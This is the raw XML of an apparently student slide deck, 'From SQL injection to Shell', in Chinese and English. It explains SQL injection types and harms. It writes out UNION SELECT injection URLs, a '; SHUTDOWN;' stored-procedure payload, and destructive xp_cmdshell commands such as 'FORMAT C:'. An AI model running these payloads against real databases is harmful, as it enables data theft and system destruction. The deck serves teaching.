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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId35"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="284" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="298" r:id="rId5"/>
    <p:sldId id="299" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="302" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="306" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="308" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="315" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="279" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="291" r:id="rId23"/>
    <p:sldId id="292" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="316" r:id="rId26"/>
    <p:sldId id="293" r:id="rId27"/>
    <p:sldId id="294" r:id="rId28"/>
    <p:sldId id="268" r:id="rId29"/>
    <p:sldId id="295" r:id="rId30"/>
    <p:sldId id="270" r:id="rId31"/>
    <p:sldId id="296" r:id="rId32"/>
    <p:sldId id="29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2B115-7B08-49C8-B4AA-249BE609045D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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EBA53-D617-4A81-861A-A8AA8C4DDCB7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604039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392A-C1AF-42FB-8C06-E3A580C23A27}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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B1333-E0E1-43D1-840F-90929F4EC7A2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3617476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813B1333-E0E1-43D1-840F-90929F4EC7A2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329676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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15637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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2924929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7D403C3-7678-4528-B9D9-1973225E1897}" type="datetime1">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84AEC6-C9E0-4E41-9718-B3772EF86F0C}"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D4415B-67FF-4431-9BEF-5B63581BB720}"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AC20B2-46DC-494D-9E5B-DD0DB2C9D9CE}"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B6C2CC-6E00-4294-9D94-828C921AD6A9}"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13751C3-6FD1-4172-8D5A-EAC3100F0D19}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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079E63F-6D8C-4A5A-AE0A-B6EFA5FDE229}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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9052BB-DD2B-4466-9BC2-B90BE49A7EE6}" type="datetime1">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5F05C-08C5-4A3D-A5FF-3C570959DB00}" type="datetime1">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CC136-0635-48BC-867B-4E7854F1FD35}" type="datetime1">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73BC44-6C26-40D8-B7B5-95EF5B8B0AC9}" type="datetime1">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7FE00D-05EA-48E9-A5B7-11CAFEDACC40}"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CB5EAB-51E2-4CE7-986E-C3F020D661B7}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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276EB6-810B-4D90-A660-3F0529E37D22}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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E40644-2F9C-41EF-A406-FBB842B5D20C}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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48A7D2-B4FC-4E39-9DD4-0F157FBA7153}"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827FD7-743C-43CC-8805-CA0558FF4650}" type="datetime1">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943E6C6-FDC0-41DD-85AA-1FD435468634}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/11/9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cat.php?id=1%20UNION%20SELECT%201,@@version,3,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cat.php?id=1%20UNION%20SELECT%201,currentuser(),3,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cat.php?id=1%20UNION%20SELECT%201,database(),3,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c.gatech.edu/~orso/papers/halfond.viegas.orso.ISSSE06.presentatio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hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.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From SQL injection to Shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006606" y="4819933"/>
            <a:ext cx="8689976" cy="1371599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Group members:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>zc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sn</a:t>
            </a:r>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21111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129672"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972602" y="2302907"/>
            <a:ext cx="10482106" cy="3508653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>When a normal SQL statement (i.e., SELECT) is created as a stored procedure, an attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>another stored procedure as a replacement for a normal stored procedure to performing privilege escalation, create denial of service, or execute remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Here is a common form using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" dirty="0"/>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>delimiter(;)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> and the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" dirty="0"/>
              <a:t>SHUTDOWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>" store procedure for this attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>normal SQL statement + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>"; SHUTDOWN;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> " &lt;rest of injected query&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972602" y="1537361"/>
            <a:ext cx="9809129" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>过程的注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当一个正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）作为存储过程创建，攻击者可以注入另一个存储过程作为正常的存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来增加权限，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建拒绝服务或执行远程命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397227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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  ——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>按获取数据方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394031" y="1300421"/>
            <a:ext cx="9294752" cy="4166303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Inband</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Inband</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术使用攻击者和有漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序之间现有的渠道来提取数据。通常该通道是标准的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器响应。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>inference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（推理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Inference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术中，攻击者通过应用程序表现的差异来推断数据的值。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Inference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术能够逐位提取恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询结果，却没有真正传输数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>out-of-band</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Out-of-band(OOB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>inband</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相反，使用其它传输信道获取数据，例如超文本传输协议和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析协议。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394031" y="5604172"/>
            <a:ext cx="6837321"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	http://blog.csdn.net/netsec_steven/article/details/52763702</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73599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0"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>注入 危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="1237877"/>
            <a:ext cx="10905186" cy="4713026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据表中的数据外泄，例如个人机密数据，账户数据，密码等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据结构被黑客探知，得以做进一步攻击（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sys.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库服务器被攻击，系统管理员账户被窜改（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALTER LOGIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> WITH PASSWORD='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取系统较高权限后，有可能得以在网页加入恶意链接、恶意代码以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> "net stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iisadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可停止服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏硬盘数据，瘫痪全系统（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> "FORMAT C:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
